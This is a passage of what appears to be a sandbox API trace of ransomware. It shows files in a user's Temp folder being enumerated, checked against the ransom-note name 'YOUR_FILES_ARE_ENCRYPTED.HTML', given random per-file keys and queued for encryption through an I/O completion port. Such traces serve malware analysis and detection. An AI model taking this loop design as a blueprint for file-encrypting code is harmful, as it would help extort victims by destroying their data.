| out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1f3f1600, ftCreationTime.dwHighDateTime=0x1d7e400, 
ftLastAccessTime.dwLowDateTime=0x4041f540, ftLastAccessTime.dwHighDateTime=0x1d7e539, ftLastWriteTime.dwLowDateTime=0x4041f540, ftLastWriteTime.dwHighDateTime=0x1d7e539, nFileSizeHigh=0x0, nFileSizeLow=0xc47a, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="PUjBXDA3t4.png", cAlternateFileName="PUJBXD~1.PNG")) returned 1 [0164.248] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\PUjBXDA3t4.png") returned 57 [0164.248] lstrcmpW (lpString1="PUjBXDA3t4.png", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.248] PathFindExtensionW (pszPath="PUjBXDA3t4.png") returned=".png" [0164.248] lstrlenW (lpString=".png") returned 4 [0164.248] PathFindExtensionW (pszPath="PUjBXDA3t4.png") returned=".png" [0164.248] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0164.248] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\PUjBXDA3t4.png" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\pujbxda3t4.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5c0 [0164.248] GetFileSizeEx (in: hFile=0x5c0, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=50298) returned 1 [0164.248] GetProcessHeap () returned 0x270000 [0164.248] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x75aa6d0 [0164.252] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="D1") returned 2 [0164.252] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="C2") returned 2 [0164.252] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="0E") returned 2 [0164.252] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="B7") returned 2 [0164.252] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="AC") returned 2 [0164.252] 
wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="BA") returned 2 [0164.252] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="60") returned 2 [0164.252] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="49") returned 2 [0164.252] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="66") returned 2 [0164.252] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="84") returned 2 [0164.252] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="51") returned 2 [0164.252] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="9F") returned 2 [0164.252] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="E7") returned 2 [0164.252] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="34") returned 2 [0164.253] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="2F") returned 2 [0164.253] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="4C") returned 2 [0164.253] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="8B") returned 2 [0164.253] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="F0") returned 2 [0164.253] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="75") returned 2 [0164.253] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="A5") returned 2 [0164.253] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="53") returned 2 [0164.253] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="6E") returned 2 [0164.253] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="BA") returned 2 [0164.253] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="F1") returned 2 [0164.253] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="E9") returned 2 [0164.253] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="A6") returned 2 [0164.253] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: 
param_1="78") returned 2 [0164.253] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="5B") returned 2 [0164.253] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="71") returned 2 [0164.253] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="40") returned 2 [0164.253] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="DF") returned 2 [0164.253] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="12") returned 2 [0164.254] lstrcpyW (in: lpString1=0x75ba784, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\PUjBXDA3t4.png" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\PUjBXDA3t4.png") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\PUjBXDA3t4.png" [0164.254] CreateIoCompletionPort (FileHandle=0x5c0, ExistingCompletionPort=0x3a0, CompletionKey=0x75aa6d0, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.254] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x75aa6d0, lpOverlapped=0x75aa6d0) returned 1 [0164.254] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa36bb80, ftCreationTime.dwHighDateTime=0x1d7e61e, ftLastAccessTime.dwLowDateTime=0x44a14e40, ftLastAccessTime.dwHighDateTime=0x1d7e6da, ftLastWriteTime.dwLowDateTime=0x44a14e40, ftLastWriteTime.dwHighDateTime=0x1d7e6da, nFileSizeHigh=0x0, nFileSizeLow=0x16545, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="QEcAKn3l.mp3", cAlternateFileName="")) returned 1 [0164.254] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\QEcAKn3l.mp3") returned 55 [0164.254] lstrcmpW (lpString1="QEcAKn3l.mp3", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.254] PathFindExtensionW (pszPath="QEcAKn3l.mp3") returned=".mp3" [0164.254] lstrlenW 
(lpString=".mp3") returned 4 [0164.254] PathFindExtensionW (pszPath="QEcAKn3l.mp3") returned=".mp3" [0164.254] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0164.254] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\QEcAKn3l.mp3" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\qecakn3l.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x594 [0164.255] GetFileSizeEx (in: hFile=0x594, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=91461) returned 1 [0164.255] GetProcessHeap () returned 0x270000 [0164.255] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x76181a8 [0164.258] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="97") returned 2 [0164.258] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="25") returned 2 [0164.258] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="BF") returned 2 [0164.258] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="9F") returned 2 [0164.258] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="87") returned 2 [0164.258] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="10") returned 2 [0164.258] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="E3") returned 2 [0164.258] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="1B") returned 2 [0164.258] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="EE") returned 2 [0164.258] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="D5") returned 2 [0164.258] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="C0") returned 2 [0164.258] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="64") returned 2 [0164.259] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: 
param_1="4E") returned 2 [0164.259] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="72") returned 2 [0164.259] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="82") returned 2 [0164.259] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="33") returned 2 [0164.259] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="7D") returned 2 [0164.259] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="22") returned 2 [0164.259] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="79") returned 2 [0164.259] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="15") returned 2 [0164.259] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="FC") returned 2 [0164.259] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="A8") returned 2 [0164.259] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="95") returned 2 [0164.259] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="80") returned 2 [0164.259] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="95") returned 2 [0164.259] lstrcpyW (in: lpString1=0x762825c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\QEcAKn3l.mp3" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\QEcAKn3l.mp3") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\QEcAKn3l.mp3" [0164.260] CreateIoCompletionPort (FileHandle=0x594, ExistingCompletionPort=0x3a0, CompletionKey=0x76181a8, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.260] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x76181a8, lpOverlapped=0x76181a8) returned 1 [0164.260] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc5c74cd0, ftCreationTime.dwHighDateTime=0x1d7dace, ftLastAccessTime.dwLowDateTime=0xed472530, 
ftLastAccessTime.dwHighDateTime=0x1d7e29b, ftLastWriteTime.dwLowDateTime=0xed472530, ftLastWriteTime.dwHighDateTime=0x1d7e29b, nFileSizeHigh=0x0, nFileSizeLow=0x719b, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="saKgVJ8BvE0.pdf", cAlternateFileName="SAKGVJ~1.PDF")) returned 1 [0164.260] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\saKgVJ8BvE0.pdf") returned 58 [0164.260] lstrcmpW (lpString1="saKgVJ8BvE0.pdf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.260] PathFindExtensionW (pszPath="saKgVJ8BvE0.pdf") returned=".pdf" [0164.260] lstrlenW (lpString=".pdf") returned 4 [0164.260] PathFindExtensionW (pszPath="saKgVJ8BvE0.pdf") returned=".pdf" [0164.260] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0164.260] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\saKgVJ8BvE0.pdf" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\sakgvj8bve0.pdf"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a8 [0164.261] GetFileSizeEx (in: hFile=0x5a8, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=29083) returned 1 [0164.261] GetProcessHeap () returned 0x270000 [0164.261] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7640300 [0164.265] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="D1") returned 2 [0164.265] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="1C") returned 2 [0164.265] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="24") returned 2 [0164.265] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="49") returned 2 [0164.265] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="62") returned 2 [0164.265] wsprintfW (in: param_1=0x4ebd73e, 
param_2="%02X" | out: param_1="0F") returned 2 [0164.265] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="7B") returned 2 [0164.265] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="20") returned 2 [0164.265] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="1A") returned 2 [0164.265] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="0F") returned 2 [0164.265] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="B3") returned 2 [0164.265] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="E5") returned 2 [0164.265] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="C6") returned 2 [0164.265] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="16") returned 2 [0164.265] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="79") returned 2 [0164.265] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="CA") returned 2 [0164.265] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="38") returned 2 [0164.265] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="83") returned 2 [0164.265] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="9E") returned 2 [0164.265] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="19") returned 2 [0164.265] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="81") returned 2 [0164.265] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="79") returned 2 [0164.265] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="EA") returned 2 [0164.265] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="32") returned 2 [0164.265] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="B4") returned 2 [0164.265] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="29") returned 2 [0164.266] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="89") returned 2 [0164.266] wsprintfW 
(in: param_1=0x4ebd796, param_2="%02X" | out: param_1="EB") returned 2 [0164.266] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="F5") returned 2 [0164.266] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="C1") returned 2 [0164.266] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="19") returned 2 [0164.266] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="34") returned 2 [0164.266] lstrcpyW (in: lpString1=0x76503b4, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\saKgVJ8BvE0.pdf" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\saKgVJ8BvE0.pdf") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\saKgVJ8BvE0.pdf" [0164.266] CreateIoCompletionPort (FileHandle=0x5a8, ExistingCompletionPort=0x3a0, CompletionKey=0x7640300, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.266] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7640300, lpOverlapped=0x7640300) returned 1 [0164.266] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2ae7130, ftCreationTime.dwHighDateTime=0x1d7dee6, ftLastAccessTime.dwLowDateTime=0xe5dab740, ftLastAccessTime.dwHighDateTime=0x1d7e5b0, ftLastWriteTime.dwLowDateTime=0xe5dab740, ftLastWriteTime.dwHighDateTime=0x1d7e5b0, nFileSizeHigh=0x0, nFileSizeLow=0x2a63, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="SWYB2x61O.ods", cAlternateFileName="SWYB2X~1.ODS")) returned 1 [0164.266] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\SWYB2x61O.ods") returned 56 [0164.266] lstrcmpW (lpString1="SWYB2x61O.ods", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.267] PathFindExtensionW (pszPath="SWYB2x61O.ods") returned=".ods" [0164.267] lstrlenW (lpString=".ods") returned 4 [0164.267] 
PathFindExtensionW (pszPath="SWYB2x61O.ods") returned=".ods" [0164.267] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0164.267] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\SWYB2x61O.ods" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\swyb2x61o.ods"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5c4 [0164.267] GetFileSizeEx (in: hFile=0x5c4, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=10851) returned 1 [0164.267] GetProcessHeap () returned 0x270000 [0164.267] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7668458 [0164.271] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="AC") returned 2 [0164.271] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="0B") returned 2 [0164.271] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="73") returned 2 [0164.271] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="59") returned 2 [0164.271] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="F9") returned 2 [0164.271] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="91") returned 2 [0164.271] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="CE") returned 2 [0164.271] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="F9") returned 2 [0164.271] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="51") returned 2 [0164.271] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="AE") returned 2 [0164.271] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="A0") returned 2 [0164.271] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="54") returned 2 [0164.271] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="66") returned 2 [0164.271] wsprintfW 
(in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="E4") returned 2 [0164.271] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="39") returned 2 [0164.271] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="2A") returned 2 [0164.271] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="98") returned 2 [0164.271] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="2F") returned 2 [0164.271] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="AA") returned 2 [0164.271] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="23") returned 2 [0164.271] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="2C") returned 2 [0164.271] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="9F") returned 2 [0164.271] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="F7") returned 2 [0164.271] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="69") returned 2 [0164.272] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="D6") returned 2 [0164.272] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="74") returned 2 [0164.272] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="9C") returned 2 [0164.272] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="15") returned 2 [0164.272] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="12") returned 2 [0164.272] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="BA") returned 2 [0164.272] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="64") returned 2 [0164.272] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="14") returned 2 [0164.272] lstrcpyW (in: lpString1=0x767850c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\SWYB2x61O.ods" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\SWYB2x61O.ods") 
returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\SWYB2x61O.ods" [0164.272] CreateIoCompletionPort (FileHandle=0x5c4, ExistingCompletionPort=0x3a0, CompletionKey=0x7668458, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.272] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7668458, lpOverlapped=0x7668458) returned 1 [0164.272] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1ed33920, ftCreationTime.dwHighDateTime=0x1d7e271, ftLastAccessTime.dwLowDateTime=0x9d020780, ftLastAccessTime.dwHighDateTime=0x1d7e65a, ftLastWriteTime.dwLowDateTime=0x9d020780, ftLastWriteTime.dwHighDateTime=0x1d7e65a, nFileSizeHigh=0x0, nFileSizeLow=0x14d14, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="TtwMJP07.jpg", cAlternateFileName="")) returned 1 [0164.272] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\TtwMJP07.jpg") returned 55 [0164.272] lstrcmpW (lpString1="TtwMJP07.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.273] PathFindExtensionW (pszPath="TtwMJP07.jpg") returned=".jpg" [0164.273] lstrlenW (lpString=".jpg") returned 4 [0164.273] PathFindExtensionW (pszPath="TtwMJP07.jpg") returned=".jpg" [0164.273] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0164.273] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\TtwMJP07.jpg" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\ttwmjp07.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5c8 [0164.273] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=85268) returned 1 [0164.273] GetProcessHeap () 
returned 0x270000 [0164.273] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x76905b0 [0164.277] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="60") returned 2 [0164.277] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="8C") returned 2 [0164.277] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="74") returned 2 [0164.277] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="A4") returned 2 [0164.277] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="85") returned 2 [0164.277] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="24") returned 2 [0164.277] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="7A") returned 2 [0164.277] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="55") returned 2 [0164.277] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="7F") returned 2 [0164.277] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="C3") returned 2 [0164.277] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="5F") returned 2 [0164.277] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="89") returned 2 [0164.277] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="CA") returned 2 [0164.277] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="7F") returned 2 [0164.277] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="14") returned 2 [0164.277] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="CB") returned 2 [0164.277] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="A6") returned 2 [0164.277] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="5D") returned 2 [0164.277] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="F0") returned 2 [0164.277] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="A6") returned 2 [0164.277] wsprintfW (in: param_1=0x4ebd77a, 
param_2="%02X" | out: param_1="E7") returned 2 [0164.277] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="BE") returned 2 [0164.277] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="DF") returned 2 [0164.277] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="B6") returned 2 [0164.278] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="34") returned 2 [0164.278] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="4D") returned 2 [0164.278] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="D0") returned 2 [0164.278] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="D1") returned 2 [0164.278] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="1C") returned 2 [0164.278] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="1C") returned 2 [0164.278] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="AF") returned 2 [0164.278] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="70") returned 2 [0164.278] lstrcpyW (in: lpString1=0x76a0664, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\TtwMJP07.jpg" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\TtwMJP07.jpg") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\TtwMJP07.jpg" [0164.278] CreateIoCompletionPort (FileHandle=0x5c8, ExistingCompletionPort=0x3a0, CompletionKey=0x76905b0, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.278] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x76905b0, lpOverlapped=0x76905b0) returned 1 [0164.278] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: 